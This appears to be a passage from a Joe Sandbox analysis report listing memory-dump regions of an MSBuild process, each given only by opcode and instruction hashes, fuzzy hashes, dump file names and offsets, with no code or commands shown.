                          • Instruction ID: 83abc74a19272e19c1bed4a3bf6a90ce35c4cc6ad6f7b9a2dfe64d273272e0cf
                          • Opcode Fuzzy Hash: 9d702e465f110d94a0333ee55ea18d44bcc8298da3ff546ef47c223dfe078cb4
                          • Instruction Fuzzy Hash: 6F017CBA3006109FD7059B64D528E1EB7A3EF88742B10852AE906CB3A5DF31DC03CBA1
                          Memory Dump Source
                          • Source File: 00000003.00000002.2331834025.0000000002AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2ae0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f4bcfb9d4d82243b081c8690b0981bfe9c8f537602b787ef9c2c802f2a0ad1a3
                          • Instruction ID: 22e48467669618ef8ade9de305fdc57b33ccc3dbab744e165106bd2eaf70ce4e
                          • Opcode Fuzzy Hash: f4bcfb9d4d82243b081c8690b0981bfe9c8f537602b787ef9c2c802f2a0ad1a3
                          • Instruction Fuzzy Hash: AA012570D5020A8FDF54DFA9C846BAEBBB1BF44314F0044A9D51AAB751DB35AA42CF90
                          Memory Dump Source
                          • Source File: 00000003.00000002.2331834025.0000000002AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2ae0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 62c1526b29d7c4f12c2ba1c02a61ef31e8487e30886adabb1b0949a749fc1ac0
                          • Instruction ID: dc70b118fdfb6d0453f6de4ef5de3caf49ab879e80c494506fce6d8cc9769614
                          • Opcode Fuzzy Hash: 62c1526b29d7c4f12c2ba1c02a61ef31e8487e30886adabb1b0949a749fc1ac0
                          • Instruction Fuzzy Hash: 001139B5504309CFDB24DF05E4A4BA27BA6FB44308F009A19D6148B385DBB9E68ADF80
                          Memory Dump Source
                          • Source File: 00000003.00000002.2331834025.0000000002AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2ae0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3de036882109387e2c10ad02ab3a68007348d53db23aba6db9643524c73fb2cc
                          • Instruction ID: 90d03f64bcc920c3d41ed31ac5d43cf827d132135ef843b4bd93c3c2e0ad712b
                          • Opcode Fuzzy Hash: 3de036882109387e2c10ad02ab3a68007348d53db23aba6db9643524c73fb2cc
                          • Instruction Fuzzy Hash: BB011634600A209FD764CF6AD088746F7E5FF8C711F40896AD94AC3B10DB34E8528B80
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351903488.00000000058F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_58f0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 162a46774fc694dafbe88f4bf7e52e3b8494d158d3d9c1e7b26ab9c70b2ff3ab
                          • Instruction ID: 713da8dd8b9bca3e7054c6b576fb1b25ab81eeb9018e4ab243adf8af456a121b
                          • Opcode Fuzzy Hash: 162a46774fc694dafbe88f4bf7e52e3b8494d158d3d9c1e7b26ab9c70b2ff3ab
                          • Instruction Fuzzy Hash: 8DF0C276A04025DBD700DAA99849EAFFFAAEB8C610F158136EE0BF3142EE705C014BC0
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353367752.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5aa0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3f8a64a087a23a1080315b2ae2ab9092352ca640ed7e7f6c7a4239bece0f7578
                          • Instruction ID: 50fc012e185318fb930714b3c830577e5dca39d236bc645081d810c4b77cb8b8
                          • Opcode Fuzzy Hash: 3f8a64a087a23a1080315b2ae2ab9092352ca640ed7e7f6c7a4239bece0f7578
                          • Instruction Fuzzy Hash: 5F0181353006149FC7089B25D428D1EBBA6EFCC711B108529E906873A5CF71ED02CBD1
                          Memory Dump Source
                          • Source File: 00000003.00000002.2331834025.0000000002AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2ae0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5db5b713be12e3fa77ab39bd28fee964ccaae611a4acd4b900da3c008c08cccb
                          • Instruction ID: 7a6455ba7951828b722c0b81e5210d23e1803c5410b568a08e2377d79287f717
                          • Opcode Fuzzy Hash: 5db5b713be12e3fa77ab39bd28fee964ccaae611a4acd4b900da3c008c08cccb
                          • Instruction Fuzzy Hash: 5401E874600B009FD764CB6AD184616FBE5FF88711B40896EE94AC3B50DB34F852CB80
                          Memory Dump Source
                          • Source File: 00000003.00000002.2331834025.0000000002AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2ae0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: fde17c46c6ffd2f821841371d4cb89c51ece3104fe293ada7cb96f6dac8c22d0
                          • Instruction ID: 13b29b481810db2def5b66cf5e17c6914c6d12cb3a31c1cb0eb06ea699182149
                          • Opcode Fuzzy Hash: fde17c46c6ffd2f821841371d4cb89c51ece3104fe293ada7cb96f6dac8c22d0
                          • Instruction Fuzzy Hash: EB017C71A05B41ABD724CF2AD418352FBE1BF84314F00C52ED55A83A90DBB9A452CB80
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e865f0a4642c1fa2052b36c5ff5a3cccc31302c2e1505d8a3a8c6222aab4b215
                          • Instruction ID: d5514120fee7043743f9b8059fd22645ed761057f96cb6cb900c081b04da7293
                          • Opcode Fuzzy Hash: e865f0a4642c1fa2052b36c5ff5a3cccc31302c2e1505d8a3a8c6222aab4b215
                          • Instruction Fuzzy Hash: 9EF0E973618114DFE714CBA5D841AEB7FB9E784360F1440EEE40DC7265DA71E501C790
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351903488.00000000058F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_58f0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 42ed205b38dc52bb59b722442dcd3cf28f046b41ae59661221e0e1c3512c4c7f
                          • Instruction ID: b025ca02fc667d8c45eaaa5f7aa0824d8264e00b2569e4e7a4253791cb4a464b
                          • Opcode Fuzzy Hash: 42ed205b38dc52bb59b722442dcd3cf28f046b41ae59661221e0e1c3512c4c7f
                          • Instruction Fuzzy Hash: 6FF02B326551159BC70AAAE4DE01BAE7BA5EB84210F5445BA9804C7AC1DE7CC90147C1
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e0be778f2e2a656c0430fff62f4e9a36846a8c68eb2424fcd0a81cfb11d313fa
                          • Instruction ID: d480f51b325e62c9d9397e6eb49c66abf14d7eab095fe4507d545f52d7bfb2e4
                          • Opcode Fuzzy Hash: e0be778f2e2a656c0430fff62f4e9a36846a8c68eb2424fcd0a81cfb11d313fa
                          • Instruction Fuzzy Hash: CC0116347001158FDB54DF68C598A997BFAFF8C200F5040A9E606DB366DE789D458F91
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351903488.00000000058F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_58f0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 84f509f036bf99195add8195877e11444ad57c10a7f9460bd77dc091cda3e65c
                          • Instruction ID: f17f24c448a0cc523841b361c89783eb87882dc32e51a9a64414cf34f891298d
                          • Opcode Fuzzy Hash: 84f509f036bf99195add8195877e11444ad57c10a7f9460bd77dc091cda3e65c
                          • Instruction Fuzzy Hash: 51E0E5627002181BD318696A6C11B7B694EEBD0750F18C43EA40DCB3A6DC65CC0503E4
                          Memory Dump Source
                          • Source File: 00000003.00000002.2331356588.000000000124D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0124D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_124d000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 39c1c0104c01728fc57e7c692c18e101eb48e78e3cd49434e8dbe9a3e29582e8
                          • Instruction ID: c6a3e9b6d66990140f163e0051098e72d595381c36a81c3e983b986d100c03e8
                          • Opcode Fuzzy Hash: 39c1c0104c01728fc57e7c692c18e101eb48e78e3cd49434e8dbe9a3e29582e8
                          • Instruction Fuzzy Hash: 08F096714043889FE719CA1ADC84B63FF98EF55734F18C45AEE484B287C2799844CA71
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351903488.00000000058F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_58f0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: aec390de4345c07686e88d2e10a5cdca8efd8e2dc3fb70d1e4b2ca6c4f9a5ef4
                          • Instruction ID: 9e229dccfee20c318414d352aa2049f1fb789485666a2db7978bb68cffaecef5
                          • Opcode Fuzzy Hash: aec390de4345c07686e88d2e10a5cdca8efd8e2dc3fb70d1e4b2ca6c4f9a5ef4
                          • Instruction Fuzzy Hash: 4CF0F6325042149FEB289B65D584B2577DAE788334F0AC055CD4AC7246D630EC40C780
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353367752.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5aa0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c9d5008b478ca4a629202468aa135a7e0266283a3763ef9ff564490ae4985332
                          • Instruction ID: 15a077f16f5d13b5939e38bc07060c0b6a70818be0ac02b65cb25f72a51fea43
                          • Opcode Fuzzy Hash: c9d5008b478ca4a629202468aa135a7e0266283a3763ef9ff564490ae4985332
                          • Instruction Fuzzy Hash: EDF06231201705ABD714CF19ED85F8AFBAEEF84310F04CA3AB5568B675DA74E90DC690
                          Memory Dump Source
                          • String ID:
                          • API String ID:
                          • Opcode ID: 910ab64a519c685e49294f5b5a2f9069d262335491e08631640cd135739f776e
                          • Instruction ID: 24da6dd0bbf52d96ef54ee7ba0a7e26236547ac19a470f7625f3286444d9db49
                          • Opcode Fuzzy Hash: 910ab64a519c685e49294f5b5a2f9069d262335491e08631640cd135739f776e
                          • Instruction Fuzzy Hash: 0CD05E32A1530DEBCB10DEB4ED054AAB3ACEB09115B1406F9AD0EC3214FA32DE50DB90
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353367752.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5aa0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d2f07745d00f64fefdce1fda1bc1c729dc647a41abcc3c667db6f5a2052b41b6
                          • Instruction ID: b7004e70c784533b22d24a662f15e914c8a5f7cfc8912c1c8e3bb4cd30917aef
                          • Opcode Fuzzy Hash: d2f07745d00f64fefdce1fda1bc1c729dc647a41abcc3c667db6f5a2052b41b6
                          • Instruction Fuzzy Hash: FFD02B373403049BDA34A7F08D04F6277EABF41610F50006ADB259F681E763EC918350
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351903488.00000000058F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_58f0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f7216717f6204bd6aacddfbada82bba2ec852c2a05aee5bf57bd0d5a7af4277c
                          • Instruction ID: db4c024f50c3404a5ec678b72320a1a8fa9784472805ae4b23b1de19d05f4067
                          • Opcode Fuzzy Hash: f7216717f6204bd6aacddfbada82bba2ec852c2a05aee5bf57bd0d5a7af4277c
                          • Instruction Fuzzy Hash: E8E0CD71809148BFCB01EBF0994195E7FF9DF05200B414DFDC40457111ED75471457C1
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351903488.00000000058F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_58f0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 62b31213359d922840c97aa0f1094332d14cc5fc2873412f484edcbcd28fc601
                          • Instruction ID: ed51ace1cf9730ea499184b2756901a55824bd2f365c2820859f697e9214a5e3
                          • Opcode Fuzzy Hash: 62b31213359d922840c97aa0f1094332d14cc5fc2873412f484edcbcd28fc601
                          • Instruction Fuzzy Hash: 93E0172970461AC3EB24AA319D8873E255BB7CD355F0A88299E03C3248FF38CC829712
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353367752.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5aa0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f71dd77d1b6035dea9f9f6696252dbbf51c7680c5d22863d2335f0c09bdde586
                          • Instruction ID: 7881d8d51c1ae4b5e74db435256dc8041e2afda7cecedfbf834b8f2694eea56e
                          • Opcode Fuzzy Hash: f71dd77d1b6035dea9f9f6696252dbbf51c7680c5d22863d2335f0c09bdde586
                          • Instruction Fuzzy Hash: 2EE0C27398B3245BCB230A615801B857B306B12B90F0B04E7DF88AF3D1E2316C58C3C9
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 43b21dc6890d3a602a12039dd1307fcd810649b59f5bb6ed7c0a824188dcd9e2
                          • Instruction ID: a4c395fa83414317c99d0b6e1fc8455b7566f94dac01cd530e08d3d44052c05a
                          • Opcode Fuzzy Hash: 43b21dc6890d3a602a12039dd1307fcd810649b59f5bb6ed7c0a824188dcd9e2
                          • Instruction Fuzzy Hash: 95E07538A01104DFCB44DB98E594A6CBBB2FB89310F24C55AE91697365CB35EC42CF00
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351903488.00000000058F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_58f0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1fed4fc377231a642de889e282443fa997c6ef54e3246e7d288f893cd45a4aa4
                          • Instruction ID: 6ff27f9176015876c294ae3d4b1ca79b6f8956f668adf0acb3072cb19bc335e5
                          • Opcode Fuzzy Hash: 1fed4fc377231a642de889e282443fa997c6ef54e3246e7d288f893cd45a4aa4
                          • Instruction Fuzzy Hash: E5E09A38A04254CBDB24DF60D48877ABBA2FB48300F4044A5DD06E3384DB308D008F92
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351903488.00000000058F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_58f0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1b52b6982a8431cac7e399c446d90985a36cbe90f2932c3dbd7e1de9688aa0d9
                          • Instruction ID: d13e5d329e0e8fe6bd7109bd0ef942b4e3853600f22e51b4c4983f60b777a836
                          • Opcode Fuzzy Hash: 1b52b6982a8431cac7e399c446d90985a36cbe90f2932c3dbd7e1de9688aa0d9
                          • Instruction Fuzzy Hash: 97D05E323A822447C34D6148E8427AE374AE794531F054129E905C7F86DA68880302D5
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351903488.00000000058F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_58f0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f56e87986953cbf16eb8173ac9bd5705fca8812cfb0a6984953e654045681d1a
                          • Instruction ID: 740cf512152885b6961f585acfd663d9abd7ea738f9a339f3be039e15076234b
                          • Opcode Fuzzy Hash: f56e87986953cbf16eb8173ac9bd5705fca8812cfb0a6984953e654045681d1a
                          • Instruction Fuzzy Hash: 8AE01270A40209EFDB44DFB5E941B7E77BAEB55200F5045A8D904DB284EA726E049780
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351903488.00000000058F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_58f0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c89ddb0f90dd8ce3c82789833b80f06d7da58408dddbe910cf3c0f940399190a
                          • Instruction ID: 7bc86959389a3b723bb201126a6c41b45e5d2c925538bcf876dc253e61696a30
                          • Opcode Fuzzy Hash: c89ddb0f90dd8ce3c82789833b80f06d7da58408dddbe910cf3c0f940399190a
                          • Instruction Fuzzy Hash: 19D05E723843061BD354D548CC82B9DB79ACBE8320F08C478A408C7B82CA2EE8438184
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 007925e784491a745aa7875161bcca592fedbffd591197c9660393543bae8106
                          • Instruction ID: 3d283dbb08fdb50b3e89505c81c008a71bf6fa11098a6612e236f336ec227245
                          • Opcode Fuzzy Hash: 007925e784491a745aa7875161bcca592fedbffd591197c9660393543bae8106
                          • Instruction Fuzzy Hash: 4ED0A77120C3441FD341C668CC15C11BBB99B96910315C09AFC48C7392FA22FD02C371
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351903488.00000000058F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_58f0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4397b8b7a34cc0fe1494239c5b29e4ee03749831f10a1234956ffc14a71d563c
                          • Instruction ID: f7a950ac308b68e6391d3aceb5d13577e5bb72f234fc5f8674622e1f5dd295eb
                          • Opcode Fuzzy Hash: 4397b8b7a34cc0fe1494239c5b29e4ee03749831f10a1234956ffc14a71d563c
                          • Instruction Fuzzy Hash: 28E01230A10108EFCB44EFA9E64169D77F9EB55204F1041A89808E7304EA716E04D791
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351903488.00000000058F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_58f0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 61cb6eb0c2bb6e897218618b6b5390077a8f722db0d7936c049c9ac793e91f32
                          • Instruction ID: bb559cd9e63285f842ffa59cec69cfb130f4eb354ed15726ef19bdad66fad4c8
                          • Opcode Fuzzy Hash: 61cb6eb0c2bb6e897218618b6b5390077a8f722db0d7936c049c9ac793e91f32
                          • Instruction Fuzzy Hash: 63D05E322041686F8300CA89C810CB6BBEC9A8D120708C05BB958C7241C976ED0287A0
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351903488.00000000058F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_58f0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 8b1a7f9c0573e3ecc749d8bc9e8068c736828ce86b1f810245163ee9e608bdab
                          • Instruction ID: abf55e28c19d6722bdf67dc15cb109852e8c81bc1500106385fa871d927f9b56
                          • Opcode Fuzzy Hash: 8b1a7f9c0573e3ecc749d8bc9e8068c736828ce86b1f810245163ee9e608bdab
                          • Instruction Fuzzy Hash: 42D0A7B63042844FD350CE6CDD12E51B7B19BFC500B45D49A954DCB381E633DD07C661
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351996598.0000000005900000.00000040.00000800.00020000.00000000.sdmp, Offset: 05900000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5900000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 985dc8b434edb674436ba2f5d964100bd06185be5fba671075e55d7b3985e2ba
                          • Instruction ID: 3ef37b5ce2d0ecd3254175088fdd49665087134a0662d7559c9e4244a2effeb9
                          • Opcode Fuzzy Hash: 985dc8b434edb674436ba2f5d964100bd06185be5fba671075e55d7b3985e2ba
                          • Instruction Fuzzy Hash: 11E0EC35E00215CFCF20CE45D100BB9B7B6BB80625F069CD5DB0C67280D3349A508BC2
                          Memory Dump Source
                          • Source File: 00000003.00000002.2331834025.0000000002AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2ae0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: be6f5c4c29d83b576d64eb46ae71c89b365f991ca48fce1e88cede256c011d24
                          • Instruction ID: c4dc5cede5f6bad7f1515d0bc139f517f0a2a15f7df6086d3a87db233eb94415
                          • Opcode Fuzzy Hash: be6f5c4c29d83b576d64eb46ae71c89b365f991ca48fce1e88cede256c011d24
                          • Instruction Fuzzy Hash: 83D0973324023AC2DB000ECDF8406B07768C780B29F04027AFB38852C0DB74410A8B00
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2d5d0f8f51ef32dc2f7b5fb1c5a3468f864ccecdd4284069fb8b088386cc4331
                          • Instruction ID: 1aeb5dd017643200905c27f0f58fef7799887c29f13d763ae98264b7111aac8f
                          • Opcode Fuzzy Hash: 2d5d0f8f51ef32dc2f7b5fb1c5a3468f864ccecdd4284069fb8b088386cc4331
                          • Instruction Fuzzy Hash: 2BD0677105C298CFA309ABB0641EC3F7F71AA5274134510CAF41B96477DF52A91B8BA6
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: cdc1a10a76ff2ba8535e65c3330dbec0180be78451f90ef1ab0a0ae80782c8a3
                          • Instruction ID: 7c01196096310fd62b70e3826a8a3291adedd4291152a1710fcb1ca1dac8e347
                          • Opcode Fuzzy Hash: cdc1a10a76ff2ba8535e65c3330dbec0180be78451f90ef1ab0a0ae80782c8a3
                          • Instruction Fuzzy Hash: ABE0177244530EAFDF034EA0D800AEA3F76AF66390F41402AF91548060D733C871EF50
                          Memory Dump Source
                          • Source File: 00000003.00000002.2351903488.00000000058F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058F0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_58f0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 363ad89d108b754bcb631c4387b65a1556c847044f8d9d9a586f0e59dc31f5cf
                          • Instruction ID: 1b214d8761a728b5d2cd02654f030b859e4c0c7c93b602168b70277c80db54d0
                          • Opcode Fuzzy Hash: 363ad89d108b754bcb631c4387b65a1556c847044f8d9d9a586f0e59dc31f5cf
                          • Instruction Fuzzy Hash: DCD0A7713041041FD304D54CCC41B15BBA6DB85214F0CC0BDA408C7343DA3AFC138780
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353367752.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5aa0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: eb9297c90b360d1ec639f9ac204913fdd0e198a69d714ae3c68ee5fef6a4c6cd
                          • Instruction ID: 93266b482d1ecd02eca4d678c1950ff6b9f8c2f2ac1c8bed167fe145063c6400
                          • Opcode Fuzzy Hash: eb9297c90b360d1ec639f9ac204913fdd0e198a69d714ae3c68ee5fef6a4c6cd
                          • Instruction Fuzzy Hash: 01D0EC311046029FCB19DB18E540D8BBB9AAF80300B04CA39A05647538DB74ED4AC784
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353367752.0000000005AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AA0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5aa0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 65db56d5a1857ea907346be2c7fabc422f99e802ca359c79d4e315bf729ece05
                          • Instruction ID: 6330e31dcc723f6ea3586785c9fa61c268e947db8170073a2eee0de596d1118b
                          • Opcode Fuzzy Hash: 65db56d5a1857ea907346be2c7fabc422f99e802ca359c79d4e315bf729ece05
                          • Instruction Fuzzy Hash: 5FD0C73394532467DA3155555C01F96775C9B55BA0F150065EF086F2849172785086D8
                          Memory Dump Source
                          • Source File: 00000003.00000002.2331834025.0000000002AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AE0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_2ae0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d6d9beabb6b960e6c03f2275700e6efe637065edbe95532f42d39cf014eb72d0
                          • Instruction ID: b3ded9fd443f13067114c1a7e93198d4eeab4b745bbbc5790deeb3294c3b18b0
                          • Opcode Fuzzy Hash: d6d9beabb6b960e6c03f2275700e6efe637065edbe95532f42d39cf014eb72d0
                          • Instruction Fuzzy Hash: 40D0923A280020CFDA509B8AE8C4B85B7A9FB98365B648052E209CB532C736D81A8B10
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 818fbbd60c945ed0d99112216551bce042fa60c85722390a6570228c58c0e813
                          • Instruction ID: 0899533724105230a8c8f1c6c18bf5724372321b017f05b5cdf1ae473f96e21c
                          • Opcode Fuzzy Hash: 818fbbd60c945ed0d99112216551bce042fa60c85722390a6570228c58c0e813
                          • Instruction Fuzzy Hash: 03D0C77295510CEB8B01EFF4DA0145E7BFDDF5520075049E5D50597210EE759B1057D1
                          Memory Dump Source
                          • Source File: 00000003.00000002.2353541056.0000000005AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AC0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5ac0000_MSBuild.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b5118d9bcae30a18404af6608a3dc7c34877b0a7b6c7a1cb788a10fe605b2c25
